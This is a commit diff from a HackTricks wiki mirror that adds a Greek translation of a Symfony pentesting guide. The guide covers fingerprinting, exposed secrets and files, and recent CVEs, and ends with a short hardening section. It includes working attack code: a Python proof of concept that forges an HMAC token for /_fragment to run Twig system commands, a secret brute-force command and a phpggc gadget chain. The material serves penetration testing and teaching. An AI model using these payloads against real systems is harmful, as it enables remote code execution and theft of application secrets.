maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/symphony.md'

Browse Source
This commit is contained in:
Translator 2025-07-23 10:25:16 +00:00
parent 51394e742a
commit 403f92e7e1
1 changed files with 117 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

121
src/network-services-pentesting/pentesting-web/symphony.md
View File

@ -2,10 +2,123 @@
{{#include ../../banners/hacktricks-training.md}}
Ρίξτε μια ματιά στις παρακάτω αναρτήσεις:
Το Symfony είναι ένα από τα πιο ευρέως χρησιμοποιούμενα PHP frameworks και εμφανίζεται τακτικά σε αξιολογήσεις στόχων επιχείρησης, ηλεκτρονικού εμπορίου και CMS (Drupal, Shopware, Ibexa, OroCRM … όλα ενσωματώνουν στοιχεία του Symfony). Αυτή η σελίδα συγκεντρώνει επιθετικές συμβουλές, κοινές κακοδιαμορφώσεις και πρόσφατες ευπάθειες που θα πρέπει να έχετε στη λίστα ελέγχου σας όταν ανακαλύπτετε μια εφαρμογή Symfony.
- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
> Ιστορική σημείωση: Ένα μεγάλο μέρος του οικοσυστήματος εξακολουθεί να τρέχει την έκδοση **5.4 LTS** (EOL **Νοέμβριος 2025**). Πάντα να επαληθεύετε την ακριβή μικρή έκδοση γιατί πολλές από τις συμβουλές ασφαλείας 2023-2025 διορθώθηκαν μόνο σε patch releases (π.χ. 5.4.46 → 5.4.50).
---
## Recon & Enumeration
### Finger-printing
* HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` ή cookies που ξεκινούν με `sf_redirect`, `sf_session`, `MOCKSESSID`.
* Διαρροές πηγαίου κώδικα (`composer.json`, `composer.lock`, `/vendor/…`) συχνά αποκαλύπτουν την ακριβή έκδοση:
```bash
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
```
* Δημόσιες διαδρομές που υπάρχουν μόνο στο Symfony:
* `/_profiler` (Symfony **Profiler** & debug toolbar)
* `/_wdt/<token>` (“Web Debug Toolbar”)
* `/_error/{code}.{_format}` (όμορφες σελίδες σφαλμάτων)
* `/app_dev.php`, `/config.php`, `/config_dev.php` (προ-4.0 dev front-controllers)
* Wappalyzer, BuiltWith ή ffuf/feroxbuster wordlists: `symfony.txt` → αναζητήστε `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
### Interesting files & endpoints
| Path | Why it matters |
|------|----------------|
| `/.env`, `/.env.local`, `/.env.prod` | Συχνά κακώς αναπτυχθέντα → διαρροές `APP_SECRET`, DB creds, SMTP, AWS keys |
| `/.git`, `.svn`, `.hg` | Διαρροή πηγής → διαπιστευτήρια + επιχειρηματική λογική |
| `/var/log/*.log`, `/log/dev.log` | Κακή διαμόρφωση web-root εκθέτει stack-traces |
| `/_profiler` | Πλήρης ιστορία αιτημάτων, διαμόρφωση, service container, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Σημείο εισόδου που χρησιμοποιείται από ESI/HInclude. Κατάχρηση δυνατή μόλις γνωρίζετε το `APP_SECRET` |
| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE αν είναι προσβάσιμο (CVE-2017-9841) |
| `/index.php/_error/{code}` | Finger-print & μερικές φορές διαρροή εξαιρέσεων |
---
## High-impact Vulnerabilities (2023-2025)
### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”)
* **CVE-2019-18889** αρχικά, αλλά *ακόμα* εμφανίζεται σε σύγχρονους στόχους όταν το debug παραμένει ενεργοποιημένο ή το `.env` είναι εκτεθειμένο.
* Μόλις γνωρίζετε το 32-char `APP_SECRET`, δημιουργήστε ένα HMAC token και καταχραστείτε τον εσωτερικό `render()` controller για να εκτελέσετε αυθαίρετο Twig:
```python
# PoC απαιτεί το μυστικό
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
```
* Εξαιρετική περιγραφή & script εκμετάλλευσης: Ambionics blog (συνδεδεμένο στις Αναφορές).
### 2. Windows Process Hijack CVE-2024-51736
* Το `Process` component αναζητούσε τον τρέχοντα κατάλογο εργασίας **πριν** από το `PATH` στα Windows. Ένας επιτιθέμενος που μπορεί να ανεβάσει `tar.exe`, `cmd.exe`, κ.λπ. σε ένα εγγράψιμο web-root και να ενεργοποιήσει το `Process` (π.χ. εξαγωγή αρχείων, δημιουργία PDF) αποκτά εκτέλεση εντολών.
* Διορθώθηκε στην 5.4.50, 6.4.14, 7.1.7.
### 3. Session-Fixation CVE-2023-46733
* Ο φρουρός αυθεντικοποίησης επαναχρησιμοποίησε ένα υπάρχον session ID μετά την είσοδο. Εάν ένας επιτιθέμενος ρυθμίσει το cookie **πριν** ο θύμα αυθεντικοποιηθεί, καταλαμβάνει τον λογαριασμό μετά την είσοδο.
### 4. Twig sandbox XSS CVE-2023-46734
* Σε εφαρμογές που εκθέτουν templates ελεγχόμενα από τον χρήστη (admin CMS, email builder) το φίλτρο `nl2br` θα μπορούσε να καταχραστεί για να παρακάμψει την sandbox και να εισάγει JS.
### 5. Symfony 1 gadget chains (ακόμα βρέθηκαν σε κληρονομημένες εφαρμογές)
* `phpggc symfony/1 system id` παράγει ένα Phar payload που ενεργοποιεί RCE όταν συμβαίνει unserialize() σε κλάσεις όπως `sfNamespacedParameterHolder`. Ελέγξτε τα endpoints ανεβάσματος αρχείων και τα wrappers `phar://`.
{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}
---
## Exploitation Cheat-Sheet
### Calculate HMAC token for `/_fragment`
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```
### Bruteforce αδύναμου `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```
### RCE μέσω εκτεθειμένου Symfony Console
Αν το `bin/console` είναι προσβάσιμο μέσω `php-fpm` ή άμεσης μεταφόρτωσης CLI:
```bash
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
```
Χρησιμοποιήστε gadgets αποδοχής μέσα στον κατάλογο cache ή γράψτε ένα κακόβουλο Twig template που θα εκτελείται στην επόμενη αίτηση.
---
## Αμυντικές σημειώσεις
1. **Ποτέ μην αναπτύσσετε debug** (`APP_ENV=dev`, `APP_DEBUG=1`) σε παραγωγή; αποκλείστε το `/app_dev.php`, `/_profiler`, `/_wdt` στη ρύθμιση του web-server.
2. Αποθηκεύστε μυστικά σε env vars ή `vault/secrets.local.php`, *ποτέ* σε αρχεία προσβάσιμα μέσω του document-root.
3. Επιβάλετε τη διαχείριση patches εγγραφείτε σε συμβουλές ασφαλείας του Symfony και διατηρήστε τουλάχιστον το επίπεδο patch LTS.
4. Εάν τρέχετε σε Windows, αναβαθμίστε άμεσα για να μετριάσετε το CVE-2024-51736 ή προσθέστε μια άμυνα βάθους `open_basedir`/`disable_functions`.
---
### Χρήσιμα επιθετικά εργαλεία
* **ambionics/symfony-exploits** secret-fragment RCE, ανακάλυψη διαδρομών debugger.
* **phpggc** Έτοιμες αλυσίδες gadgets για Symfony 1 & 2.
* **sf-encoder** μικρός βοηθός για τον υπολογισμό του `_fragment` HMAC (υλοποίηση Go).
## Αναφορές
* [Ambionics Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}}